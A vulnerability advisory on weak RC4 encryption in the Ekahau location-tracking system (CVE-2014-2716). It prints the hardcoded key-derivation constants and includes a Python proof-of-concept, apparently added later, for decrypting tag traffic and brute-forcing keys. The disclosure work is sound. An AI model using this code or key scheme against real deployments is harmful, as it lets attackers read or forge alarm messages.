------------------------------
http://www.modzero.ch/
------------------------------
modzero Security Advisory: Vulnerabilities in Ekahau
Real-Time Location System [MZ-14-01] - CVE-ID: CVE-2014-2716
------------------------------
Table of Contents
1. Timeline
2. Summary
3. Vulnerabilities
4. Recommendations
5. Vendor Response
6. Credits
7. About modzero
8. References
9. Disclaimer
Vendor: Ekahau, Inc., Helsinki [1]
Products known to be affected: Ekahau Real-Time Location System [2]
The following products were used during the security analysis. Other
versions are likely to be affected as well:
* Ekahau B4 staff badge tag hardware rev 5.7, firmware rev 1.4.52 [3]
* Ekahau RTLS Controller version 6.0.5-FINAL
* Ekahau Activator 3 software [4]
------------------------------
1. Timeline
------------------------------
* 2014-03-04: Advisory sent to the vendor
* 2014-03-13: Vendor acknowledged the initial contact
* 2014-04-01: Vendor did not provide timeline
* 2014-04-02: modzero sends a preliminary summary to MITRE
* 2014-04-03: CVE received and added: CVE-2014-2716
* 2014-10-23: modzero releases the comprehensive security advisory to
the public
* 2014-12-15: Full release of the advisory to the public
------------------------------
2. Summary
------------------------------
Ekahau's real-time location tracking uses battery-powered Wi-Fi tags to
track assets or staff. Signal measurements (RSSI) of the 802.11-based
Wi-Fi communication are processed in the Ekahau RTLS software
component, which calculates the exact position of the tag. Depending
on the tag model in use, additional information can be exchanged (e.g.
alarm events sent by the tag, or custom text messages sent to it).
According to the vendor's website, the solution is used in hospitals
and schools as a "panic button" and is meant to simplify workflows,
since persons and items can be tracked precisely. The solution only
supports Pre-Shared-Key (PSK) based WPA2 encryption on the radio
transport layer, so every person with physical access to a tag can
read the radio key from the tag's EEPROM, join the network and sniff
Ekahau data packets. As there is no easy way to rotate the key, it has
to be assumed that the key is known to a large number of individuals.
modzero found that the encryption used for Ekahau Real-Time Location
System messages suffers from severe weaknesses. An attacker is able to
read and forge arbitrary messages, including button events, text/alarm
messages and reconfiguration events.
------------------------------
3. Vulnerabilities
------------------------------
3.1. RC4 Cipher Stream Reuse
----------------------------
Severity: high
The message payload of the affected solution is always encrypted with
the same RC4 keystream: the same key is used for every message and no
per-message IV or nonce is mixed in, so the keystream is identical for
every message. When two encrypted messages are combined with an XOR
operation, the keystream cancels out and the attacker obtains the
bitwise difference of the two plaintexts without knowing the key.
Encryption of two messages m1 and m2 using the same cipher stream s,
resulting in two ciphertexts c1 and c2. s is a pseudo-random sequence
of bytes, generated using the RC4 algorithm:
c1 = m1 XOR s
c2 = m2 XOR s
An attacker records the ciphertexts c1 and c2 and XORs them. This
reveals every bit in which the plaintexts m1 and m2 differ:
c1 XOR c2
= (m1 XOR s) XOR (m2 XOR s)
= (m1 XOR m2) XOR (s XOR s)
= m1 XOR m2
Since the messages are highly structured, one known or guessable
plaintext (e.g. a fixed button event) is enough to recover the other
plaintext (m2 = c1 XOR c2 XOR m1) and the keystream s itself
(s = c1 XOR m1). With s, every further message under the same key can
be decrypted, and arbitrary messages can be forged by XORing chosen
plaintext with s.
3.2. Weak Key Derivation
------------------------
Severity: high
The 128 bit RC4 key used in the Ekahau setup is trivially derived
from the three least significant bytes of the MAC address. The key
derivation scheme can be recovered from publicly available program
code [4] or from any Ekahau tag's EEPROM.
According to the IEEE 802.11 standard [5], the MAC address is
required to be transported in clear text within the 802.11 MAC
headers. An attacker capable of sniffing the wireless network
(independent of its encryption state) can therefore read it off the
air. Using the gathered MAC address, the attacker is able to
immediately reconstruct the employed RC4 key in the following way:
prefix = "*ixpiyacoc"
mac[3:5] = the three least significant bytes (octets 3 to 5,
inclusive) of the MAC address
suffix = "+*+"
key = prefix | mac[3:5] | suffix
Only the three MAC bytes vary, so the effective key entropy is 24 bit
(2^24 candidate keys). Even if the MAC address is unknown, a
brute-force search against a single message with known or guessable
content recovers the key in a short amount of time.
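The following script is an added example and not code from modzero or Ekahau. It reconstructs the key derivation of section 3.2 from the constants given above, and on top of it demonstrates the keystream-reuse attack of section 3.1: recovering m1 XOR m2 without the key, recovering a full plaintext from a crib, decrypting with a sniffed MAC address, and a known-plaintext search over the 24-bit key space. The MAC addresses and message contents are constructed for the demonstration; the real Ekahau message format is not reproduced, and the brute-force demo uses a MAC whose low octets are small so that the search finishes immediately.

```python
"""Added example (not modzero's or Ekahau's code): RC4 key derivation
from the MAC address (section 3.2) and keystream reuse (section 3.1).
Sample MACs and messages below are constructed, not real tag traffic.
"""
from typing import Optional

PREFIX = b"*ixpiyacoc"  # 10 bytes, as given in the advisory
SUFFIX = b"+*+"         # 3 bytes, as given in the advisory


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA); returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def derive_key(mac: bytes) -> bytes:
    """Section 3.2: key = prefix | 3 least significant MAC octets | suffix.
    The advisory writes the middle part as mac[3:5] (inclusive); in
    Python slice notation that is mac[3:6]."""
    if len(mac) != 6:
        raise ValueError("expected a 6-byte MAC address")
    key = PREFIX + mac[3:6] + SUFFIX
    assert len(key) == 16  # 128-bit RC4 key, matching the advisory
    return key


def encrypt(mac: bytes, msg: bytes) -> bytes:
    """Model of the flawed scheme: no IV/nonce, so every message is XORed
    with the keystream restarted from position 0."""
    return xor(msg, rc4_keystream(derive_key(mac), len(msg)))


def recover_plaintext_xor(c1: bytes, c2: bytes) -> bytes:
    """Section 3.1: c1 XOR c2 = m1 XOR m2, no key knowledge required."""
    return xor(c1, c2)


def recover_with_crib(c1: bytes, c2: bytes, known_m1: bytes) -> bytes:
    """One known/guessable plaintext gives the other: m2 = c1^c2^m1."""
    return xor(recover_plaintext_xor(c1, c2), known_m1)


def decrypt_with_sniffed_mac(mac: bytes, ct: bytes) -> bytes:
    """Section 3.2: the MAC is in the clear in the 802.11 header, so the
    key and keystream follow directly."""
    return xor(ct, rc4_keystream(derive_key(mac), len(ct)))


def brute_force_tail(ct: bytes, known_pt: bytes) -> Optional[bytes]:
    """Section 3.2, MAC unknown: only the 3 variable key bytes matter, so
    a known-plaintext search covers at most 2**24 candidates. Returns
    the recovered 3 MAC octets, or None."""
    n = len(known_pt)
    for cand in range(1 << 24):
        tail = cand.to_bytes(3, "big")
        if xor(ct[:n], rc4_keystream(PREFIX + tail + SUFFIX, n)) == known_pt:
            return tail
    return None


if __name__ == "__main__":
    # Constructed sample data: a tag MAC and two same-length messages.
    tag_mac = bytes.fromhex("0011223344aa")
    m1 = b"EVT:BUTTON=1;TAG=42"
    m2 = b"MSG:Evacuate ward 3"
    c1, c2 = encrypt(tag_mac, m1), encrypt(tag_mac, m2)
    print("m1^m2 from ciphertexts:", recover_plaintext_xor(c1, c2).hex())
    print("m2 via crib m1        :", recover_with_crib(c1, c2, m1))
    print("m2 via sniffed MAC    :", decrypt_with_sniffed_mac(tag_mac, c2))
    # Small MAC tail (00:00:2a) so the 24-bit search returns at once.
    other_mac = bytes.fromhex("00112200002a")
    print("tail by brute force   :",
          brute_force_tail(encrypt(other_mac, m1), m1[:8]).hex())
```

Note that the two recovery paths are independent: the XOR of two ciphertexts needs no key at all, while the MAC-derived key needs no second message; a real attacker would use whichever the captured traffic allows.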
------------------------------
4. Recommendations
------------------------------
It is recommended that Ekahau corrects their implementation to ensure
message confidentiality, authenticity and integrity, e.g. by using an
authenticated encryption scheme with a unique per-message nonce and a
key that is not derivable from publicly visible data. It is further
recommended to protect secret information and to prevent access to
key material on all levels, including the tag's EEPROM. Static PSK
based radio encryption without automated key rotation is not
recommended.
------------------------------
5. Vendor Response
------------------------------
Qualified vendor response pending. The vendor now protects the
Activator download [4] with a login and password. The software might
still be available from other sources.
------------------------------
6. Credits
------------------------------
* David Gullasch (dagu (_at_) modzero.ch)
* Max Moser (mmo (_at_) modzero.ch)
------------------------------
7. About modzero
------------------------------
The independent Swiss company modzero AG assists clients with
security analysis in the complex areas of computer technology. The
focus lies on highly detailed technical analysis of concepts,
software and hardware components as well as the development of
individual solutions. Colleagues at modzero AG work exclusively in
practical, highly technical computer-security areas and can draw on
decades of experience in various platforms, system concepts, and
designs.
http://modzero.ch
info@modzero.ch
------------------------------
8. References
------------------------------
[1] http://www.ekahau.com/
[2] http://www.ekahau.com/real-
[3] http://www.ekahau.com/
B4_datasheet_letter.pdf
[4] http://sw.ekahau.com/download/
------------------------------
9. Disclaimer
------------------------------
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.